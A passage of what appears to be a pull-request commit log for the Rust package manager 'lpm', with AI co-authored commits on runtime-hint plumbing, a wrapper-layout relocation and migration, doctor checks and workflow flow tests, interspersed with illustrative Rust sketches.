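A minimal sketch of the three-state contract described above, assuming a simplified PATH builder that works on a list of segments. `build_path_segments` and its `silent_detect` closure are hypothetical stand-ins for illustration, not the signatures in `lpm-runner/bin_path`; only the enum shape and the expected segment order come from the commit message.

```rust
use std::path::{Path, PathBuf};

/// Three-state hint, mirroring the shape named in the commit message.
#[derive(Debug, Clone, PartialEq, Eq, Default)]
pub enum ManagedRuntimeHint {
    /// Caller already resolved the managed runtime's bin dir.
    Bin(PathBuf),
    /// Caller checked and confirmed there is no managed runtime to use.
    Absent,
    /// Caller has not checked; fall back to silent detection.
    #[default]
    Unknown,
}

/// Hypothetical PATH builder: returns ordered PATH segments.
/// `silent_detect` stands in for the detect + list-installed pass and
/// is only invoked for `Unknown`.
pub fn build_path_segments(
    nm_bin: &Path,
    hint: &ManagedRuntimeHint,
    inherited: &[PathBuf],
    silent_detect: impl FnOnce() -> Option<PathBuf>,
) -> Vec<PathBuf> {
    let runtime_bin = match hint {
        ManagedRuntimeHint::Bin(p) => Some(p.clone()),
        ManagedRuntimeHint::Absent => None,
        ManagedRuntimeHint::Unknown => silent_detect(),
    };
    let mut segments = vec![nm_bin.to_path_buf()];
    segments.extend(runtime_bin); // zero or one element
    segments.extend(inherited.iter().cloned());
    segments
}
```

With an `Option<PathBuf>` there would be no way to tell "checked, nothing there" apart from "not checked", which is why the sketch keeps `Absent` and `Unknown` as separate arms.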
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* refactor(lpm-runner/script): thread bin_hint through script/command entrypoints
Extends every `pub fn run_*` in the script runner with a
`bin_hint: &ManagedRuntimeHint` parameter, routing each internal
PATH-build through `build_path_with_bins_pre_resolved` instead of the
silent-detect wrapper. Nine entrypoints touched:
- run_script, run_script_with_envs, run_script_captured
- run_script_buffered, run_script_prefixed
- run_command, run_command_captured, run_command_buffered,
run_command_prefixed
No backwards-compatibility shims — per CLAUDE.md "no `// removed`
comments, no shims, no parallel slow-path wrappers." Tests pass
`&ManagedRuntimeHint::Unknown` (imported as `Unknown` at the top of
the test mod for brevity).
Public API surface change is mechanical (one extra parameter); the
sole external consumer is `lpm-cli`, migrated in the next commit.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* refactor(lpm-cli): consume bin_hint, collapse cache-config reads, delete dead wrappers
Threads the `ManagedRuntimeHint` from `commands::run::ensure_runtime`
through the script-execution chain so the downstream PATH builder
doesn't redo `detect_node_version` + `list_installed` on every
`lpm run` invocation.
Signature changes:
- `commands::run::ensure_runtime` now returns `ManagedRuntimeHint`
(`Bin(bin_dir)` for Ready/Installed; `Absent` for NotInstalled and
NoRequirement).
- `run`, `run_multi`, `run_workspace`, `run_watch`, `exec`,
`run_tasks_sequential`, `run_tasks_parallel`, `run_task`, and
`run_task_captured` all gain a `bin_hint` parameter.
Caller migration:
- `main.rs:3102` (watch path) and `main.rs:3527` (External script
shortcut) capture the hint before calling `run_watch` / `run`.
- `dev.rs` captures `runtime_hint` via the existing `tokio::join!`
block instead of discarding it; threads to the dev script invocation.
- `migrate.rs::run_verification` resolves the hint once and reuses
it across the build + test verification scripts.
Caller contract: every callsite of `run` / `run_multi` / `run_watch`
/ `exec` MUST invoke `ensure_runtime` first — that's where the
user-visible "Using node X" notice + auto-install fire. Documented
on `pub async fn run` so future callers don't bypass it accidentally.
Cache-context dedup (Tier 1.4.2):
- `run` reads `lpm.json` once at the top instead of twice (cache-hit
check + caching-enabled check both used to read).
- Migrates the simple-script path to use the existing
`try_cache_hit_with_config` and `is_task_cached_with_config`
helpers — the no-config wrappers were only used by this one
callsite.
Dead-code removal (CLAUDE.md "no shims"):
- Delete `is_task_cached`, `try_cache_hit`, `try_cache_store_with_output`
— every other call site already used the `_with_config` variants.
- Delete the `is_task_cached_false_without_lpm_json` test that
exclusively exercised the deleted wrapper; the equivalent contract
is exercised by `is_task_cached_with_config_*` tests.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* perf(lpm-cli/run): Tier 1 follow-ups — workspace pin inheritance, parallel Arc reuse, is_meta_task plumbing
Three follow-ups that landed during the M/L review pass on top of the
base hint threading:
L1 — `is_meta_task` no longer reads `package.json` per call.
Caller (`run_multi`, `run_workspace_package`) extracts `pkg.scripts`
once and threads it down through `run_tasks_sequential` /
`run_tasks_parallel` / `is_meta_task`. The dependsOn-but-no-command
case previously paid one `package.json` read per task in the
parallel loop; now zero. The `is_meta_task_from_config` alias
collapses into the single `is_meta_task` since the helper is
filesystem-free now.
L2 — `run_tasks_parallel` wraps shared per-call state in `Arc`.
Pre-Tier-1: each spawned thread did a full `clone` of the hint,
the tasks `HashMap`, the `LpmJsonConfig`, and (post-L1) the
`pkg_scripts` `HashMap`. Post-Tier-1: each is `Arc::new`'d once
before the loop, and each thread only bumps a refcount. The saving per
thread is negligible, but it avoids one deep clone per task on wide
parallel levels.
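The L2 change can be illustrated with a small sketch, assuming the shared state is just a script map. `run_level` and the output strings are hypothetical; the point is only that the map is wrapped in `Arc` once and each spawned thread clones the pointer rather than the data.

```rust
use std::collections::HashMap;
use std::sync::Arc;
use std::thread;

/// Hypothetical parallel level: one thread per task name, all sharing
/// the same script map through a single `Arc`.
pub fn run_level(tasks: &[&str], pkg_scripts: HashMap<String, String>) -> Vec<String> {
    // Wrapped once, before the loop.
    let shared = Arc::new(pkg_scripts);
    let handles: Vec<_> = tasks
        .iter()
        .map(|name| {
            // Refcount bump only; the HashMap itself is not copied.
            let scripts = Arc::clone(&shared);
            let name = name.to_string();
            thread::spawn(move || match scripts.get(&name) {
                Some(cmd) => format!("{name}: {cmd}"),
                // No command: treated here as a meta task (assumption).
                None => format!("{name}: <meta task>"),
            })
        })
        .collect();
    // Join in spawn order so the output order is deterministic.
    handles
        .into_iter()
        .map(|h| h.join().expect("worker panicked"))
        .collect()
}
```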
L3 — workspace per-member calls inherit the root hint when the
member has no own pin.
`run_workspace_package` probes the member dir via
`lpm_runtime::detect::detect_node_version` (single-dir, no walk).
If the member has its own .nvmrc / engines / lpm.json runtime,
pass `Unknown` so the silent detect resolves the member-level
pin. If not, inherit the root hint. Matches user intuition that
the workspace-root pin governs the whole workspace (like nvm
walking parent dirs).
Small behavior change: a workspace member with NO own Node pin
now uses the root-resolved managed runtime instead of falling back
to system Node. Arguably a bug fix — pre-Tier-1 behavior was
inconsistent (root auto-installed Node 22 but member silently
ran on whatever `node` happened to be on PATH).
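The L3 inheritance rule reduces to a two-way choice, sketched below. `hint_for_member` is a hypothetical helper and `member_has_own_pin` stands in for the single-directory probe; the real code in `run_workspace_package` may be shaped differently.

```rust
use std::path::PathBuf;

#[derive(Debug, Clone, PartialEq, Eq)]
pub enum ManagedRuntimeHint {
    Bin(PathBuf),
    Absent,
    Unknown,
}

/// Hypothetical helper: picks the hint for one workspace member.
/// A member with its own pin gets `Unknown` so silent detection can
/// resolve the member-level pin; otherwise the root hint is inherited.
pub fn hint_for_member(
    member_has_own_pin: bool,
    root_hint: &ManagedRuntimeHint,
) -> ManagedRuntimeHint {
    if member_has_own_pin {
        ManagedRuntimeHint::Unknown
    } else {
        root_hint.clone()
    }
}
```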
Plus the M/L review fixes batched in:
- M1: doc note on `pub async fn run` documenting the
`ensure_runtime`-must-be-called-first contract.
- M2/M3: `bin_path` test assertions tightened to compare the full
PATH segment list, not substring presence/absence (robust to
whatever managed-runtime fragments the developer's PATH happens
to contain).
- Style: `Default for ManagedRuntimeHint` returning `Unknown`; test
mods import `ManagedRuntimeHint::Unknown` so call sites read
`&Unknown` instead of `&ManagedRuntimeHint::Unknown`.
Measurement (n=101, time.perf_counter_ns(), M5 Mac, load avg ~3):
- Managed-runtime fixture (.nvmrc + 7 entries): ~150 µs / lpm run.
- No-managed-runtime fixture: ~60 µs / lpm run.
- bench/run.sh script-overhead (1ms resolution, n=21): within noise.
Sub-perceptible at ms resolution; preparatory plumbing for Tier 2
warm-path relayout. See preplan v3 status block for full numbers.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* refactor(lpm-linker): introduce LayoutPaths utility (Phase 61.0.5, no behavior change)
Centralizes wrapper / metadata / health-check path construction. Every
production callsite that built `node_modules/.lpm/...` paths inline now
goes through `LayoutPaths::for_project(project_dir).{isolated,hoisted}_*`.
61.0.5 contract: every helper returns the legacy path
(`node_modules/.lpm/`). No observable behavior change. 61.1 will flip
`isolated_*` to `<project>/.lpm/wrappers/...` as a single source-of-truth
edit; consumers migrate transparently.
Production migrations in this commit:
- `lpm-linker::cleanup_stale_entries`: wrapper-root construction
- `lpm-linker::link_one_package`: pkg-entry-dir + .linked marker
- `lpm-linker::link_finalize`: wrapper-root for bin link traversal
- `lpm-linker::link_packages_hoisted`: metadata path + nested-root (via
`hoisted_*` helpers, intentionally still scoped to `node_modules/`)
- `lpm-cli::commands::rebuild::live_package_dir`: isolated probe
`doctor.rs` predicate is intentionally NOT migrated here — its semantic
change (handling hoisted-no-conflicts via `install_appears_healthy()`)
lands in 61.4.
Adds `crates/lpm-linker/src/layout.rs` with 13 unit tests covering all
helpers including the 5 `InstallHealth` variants and the
`needs_layout_migration` invariant in 61.0.5.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-linker): flip isolated wrapper root to <project>/.lpm/wrappers/ (Phase 61.1)
The big lever — the isolated linker's per-package wrapper tree moves
out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the
relayout, `rm -rf node_modules` no longer wipes the entire incremental
linker cache, so the warm-install bench (and the user pattern Phase 57.2
surfaced — wiping node_modules after a teammate's lockfile change)
actually exercises the incremental linker.
Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..`
segment and route through `<project>/.lpm/wrappers/<seg>/...`.
Centralized in `LayoutPaths::root_symlink_target()` so the depth
math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged — they target the project root,
which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints
live inside `.lpm/wrappers/` so the relative `../../` shape is
preserved.
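The depth math for root symlinks can be sketched as follows. This is an illustration under assumptions, not the body of `LayoutPaths::root_symlink_target()`: the function signature is hypothetical, and the `node_modules/<name>` tail after the wrapper segment is inferred from the wrapper path shape mentioned elsewhere in this log.

```rust
use std::path::PathBuf;

/// Relative target for the symlink at `node_modules/<name>` under the
/// post-61.1 layout (hypothetical signature).
pub fn root_symlink_target(name: &str, wrapper_segment: &str) -> PathBuf {
    // Depth of the link below node_modules/: 0 for `pkg`, 1 for `@scope/pkg`.
    let link_depth = name.matches('/').count();
    let mut target = PathBuf::new();
    // link-depth + 1: climb out of the scope dir (if any), then out of
    // node_modules/ itself, to reach the project root.
    for _ in 0..link_depth + 1 {
        target.push("..");
    }
    target.push(".lpm");
    target.push("wrappers");
    target.push(wrapper_segment);
    target.push("node_modules");
    target.push(name);
    target
}
```

An unscoped package therefore gets one leading `..` and a scoped one gets two, which is the one-extra-segment change relative to the legacy layout.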
Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses
`pkg.wrapper_segment()` instead of hardcoding
`format!("{safe}@{version}")`. Pre-fix, local-source deps with a
`bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean
helper inside `create_symlink_or_junction`'s Windows arm so the
`../.lpm/wrappers/...` shape doesn't embed an unresolved `..`
segment in the path handed to `cmd /c mklink /J`.
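A lexical clean of the kind audit fix #7 describes might look like the sketch below. `lexical_clean` is a hypothetical name and this is not the helper inside `create_symlink_or_junction`; it only shows the technique of resolving `..` against preceding components without touching the filesystem.

```rust
use std::path::{Component, Path, PathBuf};

/// Resolves `.` and `..` purely lexically (no filesystem access, no
/// symlink resolution). Leading `..` segments that cannot be resolved
/// are kept; `..` directly under a root is dropped.
pub fn lexical_clean(path: &Path) -> PathBuf {
    let mut out = PathBuf::new();
    for comp in path.components() {
        match comp {
            Component::CurDir => {}
            Component::ParentDir => match out.components().next_back() {
                // A normal segment precedes: cancel it out.
                Some(Component::Normal(_)) => {
                    out.pop();
                }
                // Cannot climb above a root or drive prefix.
                Some(Component::RootDir) | Some(Component::Prefix(_)) => {}
                // Empty so far, or already ends in `..`: keep it.
                _ => out.push(".."),
            },
            other => out.push(other.as_os_str()),
        }
    }
    out
}
```

Applied to an absolute link path joined with a relative `../.lpm/wrappers/...` target, this yields a path with no `..` left in it, which is the shape the commit says is handed to `mklink /J`.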
`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root
`create_dir_all` covered both via parent recursion; now they're
disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when
sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape
detection.
Test fixtures migrated to use `LayoutPaths` so they track production
semantics on any future shape change. 4949 workspace tests pass;
clippy --workspace -D warnings clean; cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-cli): rebuild.rs uses LayoutPaths + closes store-fallback hole (Phase 61.2)
Three things land together because they all touch `prepare_live_package_dir`:
D8a — store-fallback hard-error. Pre-Phase-61 the function returned
`Ok(store_path)` whenever the live probe fell through, letting the
caller chdir into canonical store bytes for a lifecycle script. On
macOS (clonefile, CoW) that was silent corruption on first write; on
Linux (hardlinks) the early `if !live.starts_with(store_root)` branch
skipped detach so the script ran against shared inodes. Either way, a
soundness violation. Post-fix the function returns `Err("...not linked
into project — refusing to run lifecycle script inside the store...")`
so failures are loud, actionable, and never corrupt the store.
Audit fix #4 — wrapper-segment shape. `live_package_dir` now takes a
`wrapper_id: Option<&str>` and computes the wrapper segment via
`LayoutPaths::wrapper_segment(name, version, wrapper_id)`, the same
helper that `LinkTarget::wrapper_segment` delegates to (a single source of
truth across the linker / rebuild / future doctor code paths). Pre-fix
the inline `format!("{safe}@{version}")` silently missed every
non-Registry source: a Directory / Link / Tarball / Git dep with a
lifecycle script had its wrapper probe fail and fall through to the
store. Post-fix `ScriptablePackage` carries the `wrapper_id` derived
from `lp.source` via `Source::source_id()`.
Audit fix #5 — test inversion. The pre-existing
`prepare_live_package_dir_does_not_detach_when_path_is_under_store_root`
test pinned the silent-fallback contract D8a inverts. Replaced with
`prepare_live_package_dir_errors_when_unlinked` asserting the new
`Err("...not linked into project...")` shape; canary-bytes-intact
assertion preserved.
Adjacent fix in `p6_triage_autoexec_reference.rs`: the test seeded
the store but not the wrapper, relying on the silent-fallback hole to
run lifecycle scripts. Added a `seed_wrapper` helper that materializes
`<project>/.lpm/wrappers/<seg>/node_modules/<name>/` from the store —
mirroring real post-install state. Pre-D8a the same fixture passed by
accident; the new state captures the actual contract.
`LayoutPaths::wrapper_segment` is the new cross-crate helper.
`LinkTarget::wrapper_segment` delegates to it so the two cannot drift.
4949 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-cli): layout-aware install_state + wrapper-layout migration (Phase 61.3)
Two pieces, both load-bearing per the v3 audit fix #2 / D8c:
1. Layout-aware freshness gate. `check_install_state` AND
`try_mtime_fast_path` now consult
`LayoutPaths::needs_layout_migration()` and force `up_to_date = false`
when a populated legacy `node_modules/.lpm/` coexists with an empty
`<project>/.lpm/wrappers/`. Without this gate, an upgrade-in-place
user (binary upgraded but `node_modules/` not wiped) hash-matches
on the install-hash check, the top-of-`main` fast lane
short-circuits, and the migration code path never runs — they stay
silently on the legacy layout until something else invalidates the
hash.
2. Migration code path inside `lpm install`. Right after the fast-exit
guard returns false, `migrate_legacy_wrapper_layout` checks the
same predicate and (when true) wipes `node_modules/.lpm/` so the
subsequent `cleanup_stale_entries` rebuilds at the new wrapper-root
location. No rename-first attempt — cross-FS rename hazards
(Linux containers, network FS, EXDEV) outweigh the saved relink
cost, which Phase 61 makes faster anyway. Best-effort wipe; legacy-
state quirks don't abort the install.
D9 — migration notice modes. Human-pretty mode prints a one-line
"migrating wrapper layout" notice via `output::info`; JSON / `--quiet`
/ non-TTY remain silent.
Tests added:
- `legacy_layout_present_forces_install_via_full_read` — hash matches
but migration is owed → `up_to_date = false`.
- `legacy_layout_present_forces_install_via_mtime_fast_path` — same
but with v2 mtime line; the mtime fast path bails to slow path.
- `empty_legacy_dir_does_not_force_install` — empty `.lpm/` doesn't
count as legacy.
- `populated_new_layout_does_not_force_install` — both populated →
migration considered complete; gate stops firing.
- `migrate_legacy_wrapper_layout_wipes_legacy_state` — happy path.
- `migrate_legacy_wrapper_layout_noop_when_not_owed` — no-op
on a fresh project (doesn't synthesize directories).
- `migrate_legacy_wrapper_layout_noop_when_both_populated` —
doesn't wipe on a mid-migration mixed state (real convergence
happens via the next normal install).
4956 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* feat(lpm-cli): doctor + gitignore + sandbox comment refresh (Phase 61.4 + 61.5 + 61.7)
61.4 — `lpm doctor` predicate becomes layout-aware. The legacy
`nm.exists() && nm.join(".lpm").exists()` probe is replaced with
`LayoutPaths::install_appears_healthy()` plus a `needs_layout_migration()`
gate. The doctor now distinguishes:
- Healthy { Isolated } → "exists with .lpm/wrappers store"
- Healthy { Hoisted } → "exists with hoisted layout"
- Healthy { Mixed } → warn + remediation
- NodeModulesPresentButNoStore → warn (existing message preserved)
- NoNodeModules → fail (existing message preserved)
- legacy layout detected (migration owed) → warn pointing the user
at `lpm install` to converge
The hoisted-no-conflicts case (which the legacy predicate misreported
as "no .lpm store") now correctly classifies as healthy.
61.5 — `ensure_lpm_wrappers_gitignore` runtime helper. Mirrors
`ensure_skills_gitignore` (and the lpm-vault / npmrc siblings):
runtime "ensure once" pattern, idempotent, OpenOptions-append to
narrow the TOCTOU window. Marker is `.lpm/wrappers/`. Wired into the
install entry point alongside `migrate_legacy_wrapper_layout`.
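The "ensure once" pattern for the gitignore entry can be sketched like this. `ensure_gitignore_entry` is a hypothetical, generalized stand-in for `ensure_lpm_wrappers_gitignore`; the return value and newline handling are assumptions made for the example.

```rust
use std::fs::{self, OpenOptions};
use std::io::{self, Write};
use std::path::Path;

/// Appends `marker` to `<project>/.gitignore` unless a line already
/// matches it. Returns `Ok(true)` when the file was modified.
pub fn ensure_gitignore_entry(project: &Path, marker: &str) -> io::Result<bool> {
    let path = project.join(".gitignore");
    let existing = match fs::read_to_string(&path) {
        Ok(s) => s,
        // A missing .gitignore is treated as empty and created below.
        Err(e) if e.kind() == io::ErrorKind::NotFound => String::new(),
        Err(e) => return Err(e),
    };
    if existing.lines().any(|line| line.trim() == marker) {
        return Ok(false); // idempotent: nothing to do
    }
    // Append mode instead of read-modify-rewrite, so a concurrent writer's
    // lines are not clobbered by a stale copy of the file.
    let mut file = OpenOptions::new().create(true).append(true).open(&path)?;
    if !existing.is_empty() && !existing.ends_with('\n') {
        file.write_all(b"\n")?;
    }
    writeln!(file, "{marker}")?;
    Ok(true)
}
```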
61.7 — sandbox comment refresh. `landlock_rules.rs` explanatory
comment referenced `{project}/node_modules/.lpm/`; updated to mention
the post-Phase-61.1 `<project>/.lpm/wrappers/` location. The actual
ReadWrite rule at line 103 already grants `<project>/.lpm` so the
post-relayout location was already covered — comment-only change,
no functional impact.
Tests added:
- `ensure_lpm_wrappers_gitignore_appends_entry`
- `ensure_lpm_wrappers_gitignore_no_duplicate`
- `ensure_lpm_wrappers_gitignore_creates_when_no_gitignore`
4959 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean; no fancy-regex.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* fix(lpm-linker): retarget legacy root symlinks + dotfile-aware layout predicates
Two audit fixes (round 2 of Phase 61 review):
CRITICAL — legacy root-symlink retarget. Pre-fix, the 61.3 migration
wiped `node_modules/.lpm/` but never touched root symlinks at
`node_modules/<pkg>` whose targets pointed into the legacy
wrapper-root shape. Phase 3's `if root_link.exists()` guard skipped
recreation, so an upgrade-in-place install left dangling symlinks —
the wrapper tree was wiped, but `node_modules/<pkg>` still pointed at
the old location and stayed broken.
Fix: `cleanup_stale_entries`'s root-symlink sweep gains a second
predicate. Beyond the existing "not in `direct_names`" stale-name
removal, it now ALSO removes any root symlink whose target traverses
a `.lpm/` segment NOT followed by `wrappers/` (legacy shape). Phase 3
recreates with the correct new target. Walks `Path::components()`
so the predicate is robust to path-separator style and to whether
the relative target leads with `.lpm/` (unscoped) or `../.lpm/`
(scoped). Self-refs (target = `..`, no `.lpm`) and workspace-member
symlinks (target outside `.lpm/`) are unaffected.
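The legacy-shape predicate described above can be sketched with `Path::components()`. `is_legacy_shape_target` is a hypothetical name; the rule it encodes (a `.lpm` component not immediately followed by `wrappers`) is taken from the commit message.

```rust
use std::ffi::OsStr;
use std::path::{Component, Path};

/// True when a symlink target passes through a `.lpm` component that is
/// NOT immediately followed by `wrappers` (the pre-61.1 shape).
pub fn is_legacy_shape_target(target: &Path) -> bool {
    let mut comps = target.components().peekable();
    while let Some(comp) = comps.next() {
        if comp == Component::Normal(OsStr::new(".lpm")) {
            let next_is_wrappers = matches!(
                comps.peek(),
                Some(Component::Normal(n)) if *n == OsStr::new("wrappers")
            );
            if !next_is_wrappers {
                return true;
            }
        }
    }
    false
}
```

Because the walk is component-based, it does not matter whether the target starts with `.lpm/` or `../.lpm/`, and targets with no `.lpm` component at all (self-references, workspace members) never match.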
5 new tests:
- `cleanup_stale_entries_removes_legacy_shape_root_symlink`
- `cleanup_stale_entries_preserves_new_shape_root_symlink`
- `cleanup_stale_entries_preserves_workspace_member_symlink`
- `cleanup_stale_entries_preserves_self_reference_symlink`
- `link_finalize_retargets_legacy_root_symlink_after_migration`
(end-to-end: post-migration install produces a working symlink
resolving to a real `package.json`)
MEDIUM — `.version` schema-tag must not mask migration. The 61.1
`.version` write at the wrapper root happens BEFORE any wrapper is
materialized; pre-fix, `dir_is_nonempty` counted `.version` as
evidence of a populated layout, so a half-completed install (or any
state where the new root has only `.version`) would silently mask a
needed migration AND make `lpm doctor` report a healthy isolated
install when no wrappers actually existed. Both
`needs_layout_migration` and `install_appears_healthy` consume the
helper.
Fix: `dir_is_nonempty` now skips entries whose name starts with `.`.
Wrapper segments from `LayoutPaths::wrapper_segment` cannot produce
a leading-dot name (path-separator sanitizer is `replace('/', '+')`,
never `.`), so the dotfile filter cannot miss a real wrapper.
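Putting the 61.3 gate and the dotfile filter together gives roughly the following. This is a sketch under assumptions: the free functions below take a project path directly, whereas the source describes methods on `LayoutPaths`, and error handling is simplified to "unreadable means empty".

```rust
use std::fs;
use std::path::Path;

/// True if `dir` contains at least one entry whose name does not start
/// with `.`, so a lone `.version` tag does not count as a populated layout.
pub fn dir_is_nonempty(dir: &Path) -> bool {
    match fs::read_dir(dir) {
        Ok(entries) => entries
            .filter_map(Result::ok)
            .any(|e| !e.file_name().to_string_lossy().starts_with('.')),
        // Missing or unreadable directory is treated as empty (assumption).
        Err(_) => false,
    }
}

/// Migration is owed when the legacy root is populated and the new
/// wrapper root is not.
pub fn needs_layout_migration(project: &Path) -> bool {
    let legacy = project.join("node_modules").join(".lpm");
    let new_root = project.join(".lpm").join("wrappers");
    dir_is_nonempty(&legacy) && !dir_is_nonempty(&new_root)
}
```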
2 new tests:
- `needs_layout_migration_true_when_new_root_has_only_version_file`
- `install_appears_healthy_metadata_only_root_is_not_isolated`
4966 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* test(lpm-linker): scoped legacy-symlink retarget belt-and-braces
Audit follow-up: the scoped-name branch (`@scope/pkg`) of
`cleanup_stale_entries`'s root-symlink sweep traverses a separate
code path from the unscoped branch. The retarget fix in the prior
commit applies to both, but the existing test only exercised the
unscoped case. This test adds the scoped equivalent so a future
refactor that drops the legacy-shape predicate from the scoped
branch fails loud.
Setup: a `node_modules/@types/node` symlink whose target is the
pre-Phase-61.1 scoped shape (`../.lpm/<seg>/node_modules/@types/node`,
no `wrappers/` segment). After cleanup the legacy symlink must be
removed so Phase 3 recreates it pointing at the new
`../../.lpm/wrappers/<seg>/...` two-level shape.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Merged
7 tasks
tolgaergin added a commit that referenced this pull request May 14, 2026
…low gate
Ships the 10 cross-command flow tests enumerated in v2 baseline, flips
EXPECT_FULL_V2_FLOWS_BACKFILL to true so future flow drops hard-fail
the audit.
Each flow exercises a real-user multi-command sequence and asserts the
state-transfer claim that ties the commands together: what command A
leaves on disk / in the keychain / in the lockfile is the input
command B reads. Single-command tests assert each step in isolation;
flow tests catch state-shape mismatches between steps.
Flows shipped:
- install → patch → patch-commit → install (patch persistence)
- migrate → install → audit (lockfile round-trips)
- install → rebuild → approve-scripts → rebuild (approval lifecycle)
- doctor --fix → install (fix survives install)
- add → install → graph (added dep visible)
- install → upgrade --major → audit (envelope shape)
- token-rotate → publish --dry-run --check (token hand-off)
- publish --dry-run --check → publish (target agreement)
- install -g → run shimmed binary → uninstall -g (shim lifecycle)
- env push → env pull cross-machine (round-trip; scoped to local
smoke until a cross-machine harness lands)
Several flows had their assertions scoped narrower than the original
"catches" claim:
- Flow #6 (rebuild lifecycle): rebuild --policy=deny ignores the v2
object form of trustedDependencies that approve-scripts writes, a
real contract gap filed as private finding #75. The flow asserts
the manifest mutation; rebuild #2 only checks envelope health.
- Flow #4 (upgrade major audit): the workflow tier's MockRegistry
helpers don't mount GET /api/registry/{name} per-package (only the
batch endpoint), so upgrade's candidate selection finds no
candidates. Flow asserts envelope shape; tighten when the mock
grows the per-package GET.
- Flow #7 (env push/pull cross-machine): proper round-trip needs a
shared-vault-state test harness that doesn't exist yet. Flow smokes
per-machine env state isolation; promote when the harness lands.
- Flow #8 (install -g): gracefully degrades when install-g doesn't
emit a shim on the test runner (cli-binary tier owns the strict
contract).
Run results: 10/10 flow tests pass, all 10 v2 audit tests pass, full
lpm-workflows suite green (623/623), clippy clean, fmt clean.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…htening, cross-machine vault harness
Six focused follow-ups against the v2 coverage matrix.
JSON contract depth promotions (SemanticAsserts → InstaSnapshot):
- id 4 lpm whoami — insta snapshot added to
`whoami_recovers_session_from_refresh_token_only` in
`auth_lifecycle.rs`. Pins the envelope shape under a refresh-only
session recovery.
- id 97 lpm env ls/list — insta snapshot added to
`env_list_json_envelope_carries_keys` in `env_local.rs`. The
envelope is a flat key→masked-value map; locked with `sort_maps`
for stable ordering across `preserve_order`-enabled serde_json.
- id 101 lpm env push/pull — insta snapshot added to the GitLab
OIDC pull --json test in `env_vault.rs`. Pins the {env, count,
vars} shape after the LPM_OIDC_TOKEN canonical-input contract.
JSON contract depth promotions (None → SemanticAsserts):
- id 74 lpm approve-scripts `<pkg>` — verified the named `<pkg>`
form test reads `parsed["dry_run"]` and `parsed["approved_count"]`
via `serde_json::from_str`. Audited the other 34 None rows: most
are either commands that don't emit JSON envelopes (completions,
dev/tunnel streams, login/logout) or rows where the named sub-form
isn't directly covered by an envelope-reading test fn.
Cross-command flow #4 (install → upgrade --major → audit) tightened:
- Lifted the private `mount_upgrade_package` from `upgrade.rs` into
the shared `MockRegistry::with_full_package_metadata` helper. It
mounts the per-package GET (`/api/registry/{name}` + the
npm-direct `/{name}` path) AND the batch-metadata POST from one
metadata document, with optional `None` tarball-bytes for the
fail-tarball case. `lpm upgrade`'s candidate selector reads the
GET endpoint; the install fallback reads batch-metadata; the
shared helper makes both observable from a single call.
- Tightened the rebuild #2 assertion in flow #4 to require that the
upgrade --major --dry-run envelope mention both `2.0.0` and the
scoped package name. The assertion was previously gated behind
"shared mount missing"; that gate is removed.
Finding #75 (rebuild --policy=deny ignores object-form
trustedDependencies) — RETRACTED:
- `TrustedDependencies` in lpm-workspace is `#[serde(untagged)]`
over both `Vec<String>` (Legacy) and `HashMap<String, Binding>`
(Rich). `evaluate_trust` in rebuild.rs routes through
`matches_strict`, which prefers the concrete `name@version` key
and falls back to the `name@*` preserve key. Object form is
already supported.
- The empty `packages[]` that flow #6 originally observed was a
`TrustMatch::BindingDrift` result: the fixture's synthetic
`"sha256-flow-script-hash"` did not match the real
`compute_script_hash(store_dir)` value rebuild computes on disk.
The cause was synthetic vs. recomputed hash divergence, not a
missing reader.
- Fixed in flow #6 by computing the real script_hash via
`lpm_security::script_hash::compute_script_hash` and propagating
it through `.lpm/build-state.json` → approve-scripts → manifest.
Rebuild #2 now asserts `packages[]` contains `scripted-pkg@1.0.0`
with `trusted: true`.
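The lookup order and the drift outcome described in this retraction can be sketched as below. Everything here is a simplification for illustration: `TrustOutcome`, `evaluate_trust_sketch`, and the idea that a binding is a bare script-hash string are assumptions, not the types in lpm-workspace or rebuild.rs.

```rust
use std::collections::HashMap;

/// Hypothetical outcome type (the source names `TrustMatch::BindingDrift`;
/// the other variants are assumptions).
#[derive(Debug, PartialEq, Eq)]
pub enum TrustOutcome {
    Trusted,
    BindingDrift,
    NotListed,
}

/// Prefers the concrete `name@version` key, then falls back to `name@*`.
/// A binding whose hash differs from the on-disk hash is reported as drift.
pub fn evaluate_trust_sketch(
    bindings: &HashMap<String, String>,
    name: &str,
    version: &str,
    on_disk_script_hash: &str,
) -> TrustOutcome {
    let exact = format!("{name}@{version}");
    let wildcard = format!("{name}@*");
    let approved = bindings.get(&exact).or_else(|| bindings.get(&wildcard));
    match approved {
        None => TrustOutcome::NotListed,
        Some(hash) if hash == on_disk_script_hash => TrustOutcome::Trusted,
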